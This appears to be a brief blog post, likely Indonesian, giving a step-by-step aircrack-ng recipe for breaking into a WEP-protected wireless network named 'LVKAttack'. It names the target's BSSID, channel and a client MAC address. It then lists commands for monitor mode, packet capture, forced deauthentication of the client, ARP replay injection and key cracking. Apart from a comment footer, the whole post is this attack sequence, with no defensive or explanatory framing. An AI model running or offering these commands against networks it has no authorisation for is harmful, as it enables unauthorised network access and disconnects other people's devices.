= essid = LVKAttack =
= bsid = 00:25:86:F2:78:8A =
= canal = 1 =
= enc = WEP =
= client = 00:10:60:A0:9F:4B =
=========================================
=========================================
= - ifconfig =
= - airmon-ng start wlan0 =
=========================================
- airodump-ng mon0
- airodump-ng --bssid 00:25:86:F2:78:8A --channel 1 --write capture mon0
- aireplay-ng --deauth 10 -a 00:25:86:F2:78:8A -h 00:10:60:A0:9F:4B mon0
- aireplay-ng --arpreplay -o 0 -b 00:25:86:F2:78:8A -h 00:10:60:A0:9F:4B mon0
- aircrack-ng capture-01.cap
Tidak ada komentar:
Posting Komentar